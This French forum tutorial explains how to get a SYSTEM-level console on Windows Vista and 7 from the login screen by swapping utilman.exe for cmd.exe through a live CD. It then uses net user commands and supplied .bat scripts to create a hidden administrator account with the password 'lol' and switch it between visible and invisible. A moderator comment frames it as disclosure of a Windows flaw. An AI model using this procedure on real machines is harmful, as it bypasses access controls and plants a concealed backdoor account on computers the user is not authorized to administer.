Bonjour a tous voila un tuto pour avoir une session admin cachée
1)Téléchargez un live cd de linux (backtrack;fedora;ubuntu;kubuntu;...) ou arranger-vous pour avoir des droits admin
2)Lancez votre live cd et aller à la racine de votre disque dur (pas obligatoire si vous avez négocier la session admin pour 10 min)
3)Allez dans c:\Windows\system32
4)Cherchez utilman.exe et renommez le en utilman.bak
5)Faites une copie de cmd.exe puis renommez cette copie en utilman.exe
6)Quittez votre live cd et démarer sous windows
7a)Sous vista à l'ouverture des sessions faites windows+u
7b)Sous seven à l'ouverture des sessions cliquez sur le bouton en bas a gauche
8)Vous obtenez une console avec les privilèges systèmes(plus que admin, et oui sa existe!) donc vous ne faites pas n'importe quoi!!!
9a)Dans cette console faites:
Si vous voulez que sa soit automatisé regarder plus bas9b)net user admin /add (ou le nom que vous voulez)
9c)net user admin lol (lol est le mot de passe qui est conseille au cas ou une personne découvrirais la session)
9c)net localgroup administrateurs /add admin
10a)net user admin /activ:yes (la session est visible)
10b)net user admin /activ:no
Pour vous simplifier la tâche j'ai fait des .bat que vous devrez mettre a la racine de votre disque dur
Créer compte admin
admin - Code:
-
@echo off
net user admin /add
echo votre nom d'utilisateur est admin
echo ----------------------------------
set /p pass= entrez le mot de passe souhaité :
net user admin %pass%
echo ----------------------------------
echo votre mot de passe est %pass%
echo ne l'oubliez surtout pas !!!!
echo ----------------------------------
net localgroup administrateurs /add admin
echo vous faites maintenant partie du groupe administrateur
echo ----------------------------------
echo by adrien4607
pause
(a enregistrer en admin.bat)
Pour le lancer aller dans la console que vous avez obtenu (voir plus haut) faites:
1)Dans la console il ne doit être affiché que x:/ (x étant votre disque dur) pour cela tapez cd.. jusque il n'y ait plus que x:/
2)Taper admin.bat
Voila la session est créée avec comme mot de passe : lol
Activez compte admin (visible)
adminyes - Code:
-
@echo off
net user admin /activ:yes
explorer.exe
echo fermer la session pour faire apparaitre admin
echo By adrien 4607
pause
(a enregistrer sous adminyes.bat )
Pour le lancer aller dans la console que vous avez obtenu (voir plus haut) faites:
1)Dans la console il ne doit être affiché que x:/ (x étant votre disque dur) pour cela taper cd.. jusque il n'y ait plus que x:/
2)Taper adminyes.bat
Voila la session est activée et vous devrez voir apparaitre le menu démarrer sinon aller dans la console et faite explorer.exe
Puis faites fermer la session et tada!! la session admin apparait
Désactivez le compte admin (invisible)
adminno - Code:
-
@echo off
net user admin /activ:no
explorer.exe
echo fermer la session pour faire disparaitre admin
echo By adrien 4607
pause
( à enregistrer sous adminno.bat)
Pour le lancer aller dans la console que vous avez obtenu (voir plus haut) faitte:
1)Dans la consolle il ne doit ètre afficher que x:/ (x étant votre disque dur) pour cela taper cd.. jusque il n'y ait plus que x:/
2)taper adminno.bat
Voila la session est désactivée et vous devrez voir apparaitre le menu démarrer sinon aller dans la console et faite explorer.exe
Puis faite fermer la session et tada!!! la sesion admin disparait
Edit par V0uivrer => Ceci est une information ! Ce tuto nous révèle une faille de Windows vista et 7 ! - Code:
-